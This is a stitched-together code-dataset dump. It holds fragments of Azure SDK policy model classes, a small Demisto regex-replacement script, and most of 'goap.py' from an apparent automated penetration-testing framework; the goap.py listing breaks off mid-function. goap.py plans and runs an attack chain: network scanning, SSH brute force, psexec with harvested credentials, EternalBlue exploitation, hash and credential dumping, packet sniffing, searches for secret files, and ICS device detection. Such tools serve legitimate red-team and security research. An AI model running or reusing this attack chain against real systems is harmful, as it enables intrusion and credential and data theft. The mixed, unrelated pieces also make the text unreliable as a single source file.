self.category = category
self.description = description
self.additional_metadata_id = additional_metadata_id
class PolicyDefinitionReference(Model):
"""The policy definition reference.
All required parameters must be populated in order to send to Azure.
:param policy_definition_id: Required. The ID of the policy definition or
policy set definition.
:type policy_definition_id: str
:param parameters: The parameter values for the referenced policy rule.
The keys are the parameter names.
:type parameters: dict[str,
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterValuesValue]
:param policy_definition_reference_id: A unique id (within the policy set
definition) for this policy definition reference.
:type policy_definition_reference_id: str
:param group_names: The name of the groups that this policy definition
reference belongs to.
:type group_names: list[str]
"""
_validation = {
'policy_definition_id': {'required': True},
}
_attribute_map = {
'policy_definition_id': {'key': 'policyDefinitionId', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{ParameterValuesValue}'},
'policy_definition_reference_id': {'key': 'policyDefinitionReferenceId', 'type': 'str'},
'group_names': {'key': 'groupNames', 'type': '[str]'},
}
def __init__(self, *, policy_definition_id: str, parameters=None, policy_definition_reference_id: str=None, group_names=None, **kwargs) -> None:
super(PolicyDefinitionReference, self).__init__(**kwargs)
self.policy_definition_id = policy_definition_id
self.parameters = parameters
self.policy_definition_reference_id = policy_definition_reference_id
self.group_names = group_names
class PolicyExemption(Model):
"""The policy exemption.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:param policy_assignment_id: Required. The ID of the policy assignment
that is being exempted.
:type policy_assignment_id: str
:param policy_definition_reference_ids: The policy definition reference ID
list when the associated policy assignment is an assignment of a policy
set definition.
:type policy_definition_reference_ids: list[str]
:param exemption_category: Required. The policy exemption category.
Possible values are Waiver and Mitigated. Possible values include:
'Waiver', 'Mitigated'
:type exemption_category: str or
~azure.mgmt.resource.policy.v2020_09_01.models.ExemptionCategory
:param expires_on: The expiration date and time (in UTC ISO 8601 format
yyyy-MM-ddTHH:mm:ssZ) of the policy exemption.
:type expires_on: datetime
:param display_name: The display name of the policy exemption.
:type display_name: str
:param description: The description of the policy exemption.
:type description: str
:param metadata: The policy exemption metadata. Metadata is an open ended
object and is typically a collection of key value pairs.
:type metadata: object
:ivar system_data: Azure Resource Manager metadata containing createdBy
and modifiedBy information.
:vartype system_data:
~azure.mgmt.resource.policy.v2020_09_01.models.SystemData
:ivar id: The ID of the policy exemption.
:vartype id: str
:ivar name: The name of the policy exemption.
:vartype name: str
:ivar type: The type of the resource
(Microsoft.Authorization/policyExemptions).
:vartype type: str
"""
_validation = {
'policy_assignment_id': {'required': True},
'exemption_category': {'required': True},
'system_data': {'readonly': True},
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'policy_assignment_id': {'key': 'properties.policyAssignmentId', 'type': 'str'},
'policy_definition_reference_ids': {'key': 'properties.policyDefinitionReferenceIds', 'type': '[str]'},
'exemption_category': {'key': 'properties.exemptionCategory', 'type': 'str'},
'expires_on': {'key': 'properties.expiresOn', 'type': 'iso-8601'},
'display_name': {'key': 'properties.displayName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'metadata': {'key': 'properties.metadata', 'type': 'object'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, *, policy_assignment_id: str, exemption_category, policy_definition_reference_ids=None, expires_on=None, display_name: str=None, description: str=None, metadata=None, **kwargs) -> None:
super(PolicyExemption, self).__init__(**kwargs)
self.policy_assignment_id = policy_assignment_id
self.policy_definition_reference_ids = policy_definition_reference_ids
self.exemption_category = exemption_category
self.expires_on = expires_on
self.display_name = display_name
self.description = description
self.metadata = metadata
self.system_data = None
self.id = None
self.name = None
self.type = None
class PolicySetDefinition(Model):
"""The policy set definition.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:param policy_type: The type of policy definition. Possible values are
NotSpecified, BuiltIn, Custom, and Static. Possible values include:
'NotSpecified', 'BuiltIn', 'Custom', 'Static'
:type policy_type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.PolicyType
:param display_name: The display name of the policy set definition.
:type display_name: str
:param description: The policy set definition description.
:type description: str
:param metadata: The policy set definition metadata. Metadata is an open
ended object and is typically a collection of key value pairs.
:type metadata: object
:param parameters: The policy set definition parameters that can be used
in policy definition references.
:type parameters: dict[str,
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterDefinitionsValue]
:param policy_definitions: Required. An array of policy definition
references.
:type policy_definitions:
list[~azure.mgmt.resource.policy.v2020_09_01.models.PolicyDefinitionReference]
:param policy_definition_groups: The metadata describing groups of policy
definition references within the policy set definition.
:type policy_definition_groups:
list[~azure.mgmt.resource.policy.v2020_09_01.models.PolicyDefinitionGroup]
:ivar id: The ID of the policy set definition.
:vartype id: str
:ivar name: The name of the policy set definition.
:vartype name: str
:ivar type: The type of the resource
(Microsoft.Authorization/policySetDefinitions).
:vartype type: str
"""
_validation = {
'policy_definitions': {'required': True},
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'policy_type': {'key': 'properties.policyType', 'type': 'str'},
'display_name': {'key': 'properties.displayName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'metadata': {'key': 'properties.metadata', 'type': 'object'},
'parameters': {'key': 'properties.parameters', 'type': '{ParameterDefinitionsValue}'},
'policy_definitions': {'key': 'properties.policyDefinitions', 'type': '[PolicyDefinitionReference]'},
'policy_definition_groups': {'key': 'properties.policyDefinitionGroups', 'type': '[PolicyDefinitionGroup]'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, *, policy_definitions, policy_type=None, display_name: str=None, description: str=None, metadata=None, parameters=None, policy_definition_groups=None, **kwargs) -> None:
super(PolicySetDefinition, self).__init__(**kwargs)
self.policy_type = policy_type
self.display_name = display_name
self.description = description
self.metadata = metadata
self.parameters = parameters
self.policy_definitions = policy_definitions
self.policy_definition_groups = policy_definition_groups
self.id = None
self.name = None
self.type = None
class ResourceTypeAliases(Model):
"""The resource type aliases definition.
:param resource_type: The resource type name.
:type resource_type: str
:param aliases: The aliases for property names.
:type aliases: list[~azure.mgmt.resource.policy.v2020_09_01.models.Alias]
"""
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'aliases': {'key': 'aliases', 'type': '[Alias]'},
}
def __init__(self, *, resource_type: str=None, aliases=None, **kwargs) -> None:
super(ResourceTypeAliases, self).__init__(**kwargs)
self.resource_type = resource_type
self.aliases = aliases
class SystemData(Model):
"""Metadata pertaining to creation and last modification of the resource.
:param created_by: The identity that created the resource.
:type created_by: str
:param created_by_type: The type of identity that created the resource.
Possible values include: 'User', 'Application', 'ManagedIdentity', 'Key'
:type created_by_type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.CreatedByType
:param created_at: The timestamp of resource creation (UTC).
:type created_at: datetime
:param last_modified_by: The identity that last modified the resource.
:type last_modified_by: str
:param last_modified_by_type: The type of identity that last modified the
resource. Possible values include: 'User', 'Application',
'ManagedIdentity', 'Key'
:type last_modified_by_type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.CreatedByType
:param last_modified_at: The timestamp of resource last modification (UTC)
:type last_modified_at: datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(self, *, created_by: str=None, created_by_type=None, created_at=None, last_modified_by: str=None, last_modified_by_type=None, last_modified_at=None, **kwargs) -> None:
super(SystemData, self).__init__(**kwargs)
self.created_by = created_by
self.created_by_type = created_by_type
self.created_at = created_at
self.last_modified_by = last_modified_by
self.last_modified_by_type = last_modified_by_type
self.last_modified_at = last_modified_at
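A minimal usage sketch (not part of the generated SDK file above): constructing SystemData with the keyword-only arguments shown in its __init__; all values below are illustrative.
import datetime

audit_info = SystemData(
    created_by='alice@example.com',
    created_by_type='User',
    created_at=datetime.datetime(2021, 1, 1, 12, 0, 0),
    last_modified_by='bob@example.com',
    last_modified_by_type='Application',
    last_modified_at=datetime.datetime(2021, 6, 1, 9, 30, 0),
)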
| 40.370629
| 265
| 0.66566
|
d5a8077a73f7d41a3e06ba9c08322221d3ce0b42
| 826
|
py
|
Python
|
Packs/ReplaceMatchGroup/Scripts/ReplaceMatchGroup/ReplaceMatchGroup.py
|
ddi-danielsantander/content
|
67e2edc404f50c332d928dbdbce00a447bb5532f
|
[
"MIT"
] | 1
|
2020-04-19T11:05:42.000Z
|
2020-04-19T11:05:42.000Z
|
Packs/ReplaceMatchGroup/Scripts/ReplaceMatchGroup/ReplaceMatchGroup.py
|
ddi-danielsantander/content
|
67e2edc404f50c332d928dbdbce00a447bb5532f
|
[
"MIT"
] | 1
|
2020-07-29T21:48:58.000Z
|
2020-07-29T21:48:58.000Z
|
Packs/ReplaceMatchGroup/Scripts/ReplaceMatchGroup/ReplaceMatchGroup.py
|
ddi-danielsantander/content
|
67e2edc404f50c332d928dbdbce00a447bb5532f
|
[
"MIT"
] | 2
|
2020-07-15T06:41:52.000Z
|
2020-07-19T18:45:23.000Z
|
import demistomock as demisto
from CommonServerPython import DemistoException
import re
def main(args):
value = args['value']
replace_with = args['replace_with']
output = list()
start = 0
try:
regex = re.compile(args['regex'])
except (re.error, TypeError):
raise DemistoException('Could not compile regex.')
for match in regex.finditer(value):
for index, _ in enumerate(match.groups(), start=1):
end = match.start(index)
output.append(value[start:end])
output.append(replace_with)
start = match.end(index)
output.append(value[start:]) # Handling the tail of the string
return ''.join(output)
if __name__ in ["__builtin__", "builtins", "__main__"]:
result = main(demisto.args())
demisto.results(result)
| 26.645161
| 67
| 0.641646
|
37739647da0aa5b389939212657056aa40eec476
| 26,237
|
py
|
Python
|
goap/goap.py
|
PowderKegTech/mushikago
|
f09da10275c6df0e1a6121118ea4036bd1f6ae9a
|
[
"Apache-2.0"
] | 29
|
2021-04-26T15:38:54.000Z
|
2021-12-15T04:03:00.000Z
|
goap/goap.py
|
PowderKegTech/mushikago
|
f09da10275c6df0e1a6121118ea4036bd1f6ae9a
|
[
"Apache-2.0"
] | 1
|
2022-02-17T09:48:46.000Z
|
2022-02-17T09:48:46.000Z
|
goap/goap.py
|
PowderKegTech/mushikago
|
f09da10275c6df0e1a6121118ea4036bd1f6ae9a
|
[
"Apache-2.0"
] | 7
|
2021-07-19T11:10:29.000Z
|
2021-12-13T00:36:44.000Z
|
from arsenal import arpscan
from arsenal import mynmap
from arsenal import msploit
from arsenal import masscan
from arsenal import ics_detect
from database import write_json
from database import attack_tree
from database import mushilogger
import json
import random
import subprocess
import copy
import pprint
from ipaddress import IPv4Network
from ipaddress import IPv4Interface
from ipaddress import IPv4Address
class GoapSymbol():
node = []
link = []
node_json = {}
node_id = 0
pre_node_id = 0
mushikago_ipaddr = ""
class_a = []
class_b = []
mode = ""
def __init__(self, actionfile):
print("init symbol..")
self.actions = self.load_action(actionfile)
if actionfile == "actions-it.json":
self.mode = "it"
elif actionfile == "actions-ics.json":
self.mode = "ics"
self.mushikago_ipaddr = self.get_ipaddr()
self.class_a.append('10.0.0.0')
for num in range(1, 256):
self.class_a.append(str(IPv4Address('10.0.0.0') + 65536*num))
self.class_b.append('172.16.0.0')
for num in range(1, 16):
self.class_b.append(str(IPv4Address('172.16.0.0') + 65536*num))
self.goal = {
"GoalSymbol_AttackIcs": True,
"GoalSymbol_GetLocalSecretInfo": True,
"GoalSymbol_GetNwSecretInfo": True
}
self.state = {
"Symbol_GetLanNodes": None,
"Symbol_TcpScan": None,
"Symbol_UdpScan": None,
"Symbol_IdentOs": None,
"Symbol_LateralMovement": None,
"Symbol_ArpPoisoning": None,
"Symbol_GetNetworkInfo": None,
"Symbol_DCCheck": None,
"Symbol_LogonUserInfo": None,
"Symbol_DomainUser": None,
"Symbol_LocalUser": None,
"Symbol_ValidUser": None,
"Symbol_CreateUser": None,
"Symbol_GetOsPatch": None,
"Symbol_PrivilegeEscalation": None,
"Symbol_ProcessInfo": None,
"Symbol_ProcessMigrate": None,
"Symbol_MainDriveInfo": None,
"Symbol_SearchMainDrive": None,
"Symbol_NwDriveInfo": None,
"Symbol_SearchNwDrive": None,
"GoalSymbol_GetLocalSecretInfo": None,
"GoalSymbol_GetNwSecretInfo": None,
"Symbol_PacketInfo": None,
"Symbol_GetIcsProtocol": None,
"Symbol_GetIcsDevice": None,
"GoalSymbol_AttackIcs": None
}
self.wjson = write_json.WriteJson()
self.wcsv = attack_tree.AttackTree()
self.pre_exe = None
self.mlogger = mushilogger.MushiLogger()
def load_action(self, actionfile):
with open(actionfile) as f:
return json.load(f)
def get_ipaddr(self):
try:
ipaddr = subprocess.check_output('ifconfig eth0 | grep "inet " | grep -oP \'inet [0-9]*\.[0-9]*\.[0-9]*\.[0-9]*\' | sed \'s/inet //\'', shell=True).decode('utf-8')
#print(res)
return ipaddr.replace('\n', '')
except:
print("get-ipaddr error!!")
def goap_plannning(self, goap_node):
available_action = []
plan = []
#print("goap planning start..")
self.mlogger.writelog("goap planning start..", "info")
for i in range(100):
#print("\n")
print("\ntake = {}\n".format(i))
#print("\n")
if (goap_node.state["GoalSymbol_AttackIcs"] == goap_node.goal["GoalSymbol_AttackIcs"] or goap_node.state["GoalSymbol_GetLocalSecretInfo"] == goap_node.goal["GoalSymbol_GetLocalSecretInfo"] or goap_node.state["GoalSymbol_GetNwSecretInfo"] == goap_node.goal["GoalSymbol_GetNwSecretInfo"]):
return plan
for key in goap_node.actions.keys():
match_count = 0
for symbol, value in goap_node.actions[key]["precond"].items():
#print("{}, {}, {}".format(key, symbol, value))
if (goap_node.state[symbol] == value):
match_count += 1
if (match_count == len(goap_node.actions[key]["precond"])):
#print("match!!")
available_action.append(key)
#print("available_action = {}".format(available_action))
self.mlogger.writelog("available plan = " + pprint.pformat(available_action, width=500, compact=True), "info")
if (len(available_action) == 0):
#print("No available action")
self.mlogger.writelog("No available action", "info")
exit(0)
            # currently, use Dijkstra algorithm
# A* or Dijkstra's algorithm or random
tmp = 100
tmp_list = []
for key in available_action:
if (goap_node.actions[key]["priority"] < tmp):
priority_key = key
tmp = goap_node.actions[key]["priority"]
tmp_list.clear()
tmp_list.append(priority_key)
elif (goap_node.actions[key]["priority"] == tmp):
tmp_list.append(key)
#print("tmp_list = {}".format(tmp_list))
#print("len(tmp_list) = {}".format(len(tmp_list)))
#for i in range(len(tmp_list)):
# if priority_key not in plan:
# break
while (True):
priority_key = random.choice(tmp_list)
if priority_key not in plan:
break
#print("{}, {}".format(priority_key, goap_node.actions[priority_key]))
#print("pre_choise_key = {}".format(pre_choise_key))
plan.append(priority_key)
available_action.clear()
#print("plan = {}".format(plan))
#print("state = {}".format(goap_node.state))
for key, value in goap_node.actions[priority_key]["effect"].items():
goap_node.state[key] = value
#print("key = {}, value = {}".format(key, value))
#print("state = {}".format(goap_node.state))
def select_target(self):
target_list = {}
performed_list = {}
for num in range(1, len(self.node)): # num 0 is mushikago
if self.node[num]["os"] == "Linux":
if self.node[num]["session"] == "" and self.node[num]["goap"]["Symbol_LateralMovement"] == None:
if len(self.node[num]["ports"]) > 0:
for port_num in range(0, len(self.node[num]["ports"])):
#if self.node[num]["ports"][port_num]["number"] == "22/tcp" and self.node[num]["ports"][port_num]["service"] == "ssh":
if self.node[num]["ports"][port_num]["number"] == "22/tcp" and self.node[num]["ports"][port_num]["service"] == "ssh":
target_list[self.node[num]["id"]] = num
else:
if self.mode == "it":
if self.node[num]["goap"]["Symbol_SearchMainDrive"] == None or self.node[num]["goap"]["Symbol_SearchNwDrive"] == None:
performed_list[self.node[num]["id"]] = num
elif self.mode == "ics":
if self.node[num]["goap"]["Symbol_GetIcsProtocol"] == None or self.node[num]["goap"]["Symbol_GetIcsDevice"] == None:
performed_list[self.node[num]["id"]] = num
if self.node[num]["os"] == "Windows":
if self.node[num]["session"] == "" and self.node[num]["goap"]["Symbol_LateralMovement"] == None:
target_list[self.node[num]["id"]] = num
else:
if self.mode == "it":
if self.node[num]["goap"]["Symbol_SearchMainDrive"] == None or self.node[num]["goap"]["Symbol_SearchNwDrive"] == None:
performed_list[self.node[num]["id"]] = num
elif self.mode == "ics":
if self.node[num]["goap"]["Symbol_GetIcsProtocol"] == None or self.node[num]["goap"]["Symbol_GetIcsDevice"] == None:
performed_list[self.node[num]["id"]] = num
print("target_list = {}".format(target_list))
print("performed_list = {}".format(performed_list))
if len(performed_list) != 0:
target, node_num = random.choice(list(performed_list.items()))
target_list.clear()
performed_list.clear()
#print("goap_state = {}".format(self.node[node_num]["goap"]))
return target, node_num, self.node[node_num]["goap"]
elif len(target_list) != 0:
target, node_num = random.choice(list(target_list.items()))
target_list.clear()
performed_list.clear()
#print("goap_state = {}".format(self.node[node_num]["goap"]))
return target, node_num, self.node[node_num]["goap"]
else:
return None, None, None
def plan_execute(self, goap_node, node_id, plan, target, node_num):
#print("plan = {}".format(plan))
self.mlogger.writelog("action plan = " + pprint.pformat(plan, width=500, compact=True), "info")
for p in plan:
print("execute action = {}".format(p))
if p == "arpscan":
if target == self.mushikago_ipaddr:
pre_node_id = node_id
arpscanInstance = arpscan.ArpScan()
node_id = arpscanInstance.execute_arpscan(self.node, self.link, node_id)
node_id = node_id + 1 # mushikago used
self.node_json['nodes'] = self.node
self.node_json['links'] = self.link
#print("node_json = {}".format(self.node_json))
#print("node_id = {}".format(node_id))
if self.pre_exe == None:
self.wcsv.write(["name", "parent", "ip", "mitre"])
target = self.node[0]["id"] # target to mushikago
self.wcsv.write(["T1120 (arpscan) - " + self.node[0]["id"], self.pre_exe, self.node[0]["id"], "T1120"])
self.pre_exe = "T1120 (arpscan) - " + self.node[0]["id"]
goap_node.state["Symbol_GetLanNodes"] = True
self.node[0]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
else:
exploit = msploit.MetaSploit()
nwaddr = IPv4Interface(target+'/16').network
exploit.execute_arpscan(str(nwaddr[0]), "/16", self.node, node_num)
pre_node_id = node_id
arpscanInstance = arpscan.ArpScan()
node_id = arpscanInstance.execute_arpscan_fm_mp(self.node, self.link, node_id, target)
self.wcsv.write(["T1120 (arpscan) - " + target, self.pre_exe, target, "T1120"])
goap_node.state["Symbol_GetLanNodes"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "tcpscan":
mynmapInstance = mynmap.MyNmap()
proxy = 0
for num in range(pre_node_id, node_id, 1):
mynmapInstance.execute_nmap(self.node[num]["id"], num, self.node, proxy)
#print("node_json = {}".format(self.node_json))
if self.pre_exe == "T1120 (arpscan) - " + self.node[0]["id"]: # If first tcpscan
self.wcsv.write(["T1046 (tcpscan) - " + self.node[0]["id"], self.pre_exe, self.node[0]["id"], "T1046, T1018"])
self.pre_exe = "T1046 (tcpscan) - " + self.node[0]["id"]
goap_node.state["Symbol_TcpScan"] = True
goap_node.state["Symbol_IdentOs"] = True
self.node[0]["goap"] = copy.deepcopy(goap_node.state)
else:
self.wcsv.write(["T1046 (tcpscan) - " + target, self.pre_exe, target, "T1046, T1018"])
goap_node.state["Symbol_TcpScan"] = True
goap_node.state["Symbol_IdentOs"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "exploit_lateral":
res = -1
# select exploit
if res != 0 and self.node[node_num]["os"] == "Linux":
exploit = msploit.MetaSploit()
res = exploit.execute_ssh_bruteforce(target, node_num, self.node)
if res != 0:
for num in range(1, len(self.node)):
if len(self.node[num]["local_account_pass"]) > 0:
value = iter(self.node[num]["local_account_pass"])
for account, password in zip(value, value):
exploit = msploit.MetaSploit()
res = exploit.execute_ms17_10_psexec(target, node_num, self.node, self.mushikago_ipaddr, account, password)
if res == 0:
break
else:
continue
if res != 0 and self.node[node_num]["os"] == "Windows":
for num in range(1, len(self.node)):
if len(self.node[num]["local_account_pass"]) > 0:
value = iter(self.node[num]["local_account_pass"])
for account, password in zip(value, value):
exploit = msploit.MetaSploit()
res = exploit.execute_ms17_10_psexec(target, node_num, self.node, self.mushikago_ipaddr, account, password)
if res == 0:
break
else:
continue
if res != 0 and self.node[node_num]["os"] == "Windows":
exploit = msploit.MetaSploit()
res = exploit.execute_eternalblue(target, node_num, self.node, self.mushikago_ipaddr)
if res == 0:
goap_node.state["Symbol_LateralMovement"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wcsv.write(["TA0008 (exploit_lateral) - " + target, self.pre_exe, target, "TA0008"])
self.pre_exe = "TA0008 (exploit_lateral) - " + target
self.wjson.write(self.node_json)
else:
goap_node.state["Symbol_LateralMovement"] = False
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wcsv.write(["TA0008 (exploit_lateral) - " + target, self.pre_exe, target, "TA0008"])
self.pre_exe = "TA0008 (exploit_lateral) - " + target
self.wjson.write(self.node_json)
#print("replanning...")
self.mlogger.writelog("replanning...", "info")
return node_id
"""
exploit.execute_bluekeep("10.1.200.5")
exploit.execute_incognito()
"""
elif p == "get_networkinfo":
exploit = msploit.MetaSploit()
exploit.execute_ipconfig(node_num, self.node)
exploit.execute_netstat(node_num, self.node)
self.wcsv.write(["T1016(get_networkinfo) - " + target, self.pre_exe, target, "T1016, T1049"])
goap_node.state["Symbol_GetNetworkInfo"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_processinfo":
exploit = msploit.MetaSploit()
exploit.execute_ps(node_num, self.node)
self.wcsv.write(["T1057 (get_processinfo) - " + target, self.pre_exe, target, "T1057, T1059"])
goap_node.state["Symbol_ProcessInfo"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_local_user":
exploit = msploit.MetaSploit()
exploit.execute_netuser(node_num, self.node)
exploit.get_hash(target, node_num, self.node)
self.wcsv.write(["T1087 (get_local_user) - " + target, self.pre_exe, target, "T1087"])
goap_node.state["Symbol_LocalUser"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_domain_user":
exploit = msploit.MetaSploit()
exploit.execute_netuserdomain(node_num, self.node)
exploit.execute_creds_tspkg(node_num, self.node)
self.wcsv.write(["T1087 (get_domain_user) - " + target, self.pre_exe, target, "T1087"])
goap_node.state["Symbol_DomainUser"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_ospatch":
exploit = msploit.MetaSploit()
exploit.execute_getospatch(node_num, self.node)
self.wcsv.write(["T1003 (get_ospatch) - " + target, self.pre_exe, target, "T1003, T1059, T1082"])
goap_node.state["Symbol_GetOsPatch"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_maindrvinfo":
exploit = msploit.MetaSploit()
secret_data = exploit.execute_getmaindrvinfo(node_num, self.node)
self.wcsv.write(["T1083 (get_maindrvinfo) - " + target, self.pre_exe, target, "T1083, TA0009, TA0010"])
goap_node.state["Symbol_MainDriveInfo"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_netdrvinfo":
exploit = msploit.MetaSploit()
exploit.execute_netuse(node_num, self.node)
self.wcsv.write(["T1083 (get_netdrvinfo) - " + target, self.pre_exe, target, "T1083, T1135"])
goap_node.state["Symbol_NetDriveInfo"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_local_secretinfo":
exploit = msploit.MetaSploit()
secret_data = exploit.execute_getlocalsecretinfo(node_num, self.node)
self.wcsv.write(["TA0009 (get_local_secretinfo) - " + target, self.pre_exe, target, "TA0009"])
if secret_data == 1:
goap_node.state["GoalSymbol_GetLocalSecretInfo"] = True
else:
goap_node.state["GoalSymbol_GetLocalSecretInfo"] = False
goap_node.state["Symbol_SearchMainDrive"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_nw_secretinfo":
secret_data = 0
if len(self.node[node_num]["network_drive"]) > 0:
exploit = msploit.MetaSploit()
secret_data = exploit.execute_getnwsecretinfo(node_num, self.node)
self.wcsv.write(["TA0009 (get_nw_secretinfo) - " + target, self.pre_exe, target, "TA0009"])
if secret_data == 1:
goap_node.state["GoalSymbol_GetNwSecretInfo"] = True
else:
goap_node.state["GoalSymbol_GetNwSecretInfo"] = False
goap_node.state["Symbol_SearchNwDrive"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_packetinfo":
exploit = msploit.MetaSploit()
if self.node[node_num]["os"] == "Windows":
exploit.execute_sniff_win(node_num, self.node)
elif self.node[node_num]["os"] == "Linux":
exploit.execute_sniff_linux(node_num, self.node)
self.wcsv.write(["T1040 (get_packetinfo) - " + target, self.pre_exe, target, "T1040"])
goap_node.state["Symbol_PacketInfo"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "detect_ics_protocol":
ics = ics_detect.IcsDetect()
ics.detect_protocol(node_num, self.node)
self.wcsv.write(["T1046 (detect_ics_protocol) - " + target, self.pre_exe, target, "T1046"])
goap_node.state["Symbol_GetIcsProtocol"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "detect_ics_device":
ics = ics_detect.IcsDetect()
ics.detect_device(node_num, self.node)
self.wcsv.write(["T1120 (detect_ics_device) - " + target, self.pre_exe, target, "T1120"])
goap_node.state["Symbol_GetIcsDevice"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
#self.wjson.write(self.node_json)
#print("node = {}".format(self.node))
return node_id
def check_ipaddr(self, ipaddr):
for num in range(1, len(self.node)):
if ipaddr == self.node[num]["id"]:
return -1
return 0
def getip_from_ipconfig_info(self, num, ipaddr_list):
value = iter(self.node[num]["ipconfig_info"])
for ipaddr, netmask in zip(value, value):
if ipaddr != self.node[num]["id"]:
#print("ipaddr = {}, netmask = {}".format(ipaddr, netmask))
self.mlogger.writelog("ipaddr = " + ipaddr + ", netmask = " + netmask, "debug")
res = self.check_ipaddr(ipaddr)
if res == 0:
ipaddr_list[ipaddr] = num
def getip_from_netstat_info(self, num, ipaddr_list):
value = iter(self.node[num]["netstat_info"])
for ipaddr, port in zip(value, value):
if ipaddr != self.node[0]["id"]:
#print("ipaddr = {}, port = {}".format(ipaddr, port))
self.mlogger.writelog("ipaddr = " + ipaddr + ", port = " + port, "debug")
res = self.check_ipaddr(ipaddr)
if res == 0:
ipaddr_list[ipaddr] = num
def scan_from_network_info(self, ipaddr_list, getnw_list):
for num in range(1, len(self.node)):
if self.node[num]["session"] != "":
#print("session is exist = {}".format(self.node[num]["id"]))
self.mlogger.writelog("session is exist = " + self.node[num]["id"], "debug")
if self.node[num]["goap"]["Symbol_GetNetworkInfo"] == True:
if self.node[num]["ipconfig_info"] != "":
#print("ipconfig_info is exist = {}".format(self.node[num]["ipconfig_info"]))
self.mlogger.writelog("ipconfig_info is exist = " + pprint.pformat(self.node[num]["ipconfig_info"]), "debug")
self.getip_from_ipconfig_info(num, ipaddr_list)
if self.node[num]["netstat_info"] != "":
#print("netstat_info is exist = {}".format(self.node[num]["netstat_info"]))
self.mlogger.writelog("netstat_info is exist = " + pprint.pformat(self.node[num]["netstat_info"]), "debug")
self.getip_from_netstat_info(num, ipaddr_list)
else:
getnw_list.append(num)
else:
#print("session is nothing = {}".format(self.node[num]["id"]))
self.mlogger.writelog("session is nothing = " + self.node[num]["id"], "debug")
def force_get_networkinfo(self, goap_node, node_id, ipaddr_list, getnw_list):
for node_num in getnw_list:
print("get_networkinfo ipaddr = {}".format(self.node[node_num]["goap"]))
goap_node.state = copy.deepcopy(self.node[node_num]["goap"])
target = self.node[node_num]["id"]
plan = ["get_networkinfo"]
node_id = goap_node.plan_execute(goap_node, node_id, plan, target, node_num)
self.scan_from_network_info(ipaddr_list, getnw_list)
def segment_scan(self, exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, private_ip):
nwaddr = IPv4Interface(ipaddr+'/16').network
#print("scan nwaddr = {}".format(nwaddr))
self.mlogger.writelog("scan nwaddr = " + str(nwaddr), "info")
#print("nwaddr_10[0] = {}".format(nwaddr[0]))
if private_ip == 10:
for scan_nwaddr in self.class_a:
exploit.setting_route(scan_nwaddr, "255.255.0.0", self.node[node_num]["session"])
node_id = nwscan.execute_masscan(scan_nwaddr+"/16", self.node[node_num]["id"], self.node, self.link, node_id)
if node_id > pre_node_id:
try:
delete_index = self.class_a.index(str(nwaddr[0]))
self.class_a.pop(delete_index)
except:
pass
break
elif private_ip == 172:
for scan_nwaddr in self.class_b:
exploit.setting_route(scan_nwaddr, "255.255.0.0", self.node[node_num]["session"])
node_id = nwscan.execute_masscan(scan_nwaddr+"/16", self.node[node_num]["id"], self.node, self.link, node_id)
if node_id > pre_node_id:
try:
                        delete_index = self.class_b.index(str(nwaddr[0]))
                        self.class_b.pop(delete_index)
except:
pass
break
        elif private_ip == 192:
            exploit.setting_route(str(nwaddr[0]), "255.255.0.0", self.node[node_num]["session"])
            node_id = nwscan.execute_masscan(str(nwaddr[0])+"/16", self.node[node_num]["id"], self.node, self.link, node_id)
return node_id
def network_scan(self, node_id, goap_node):
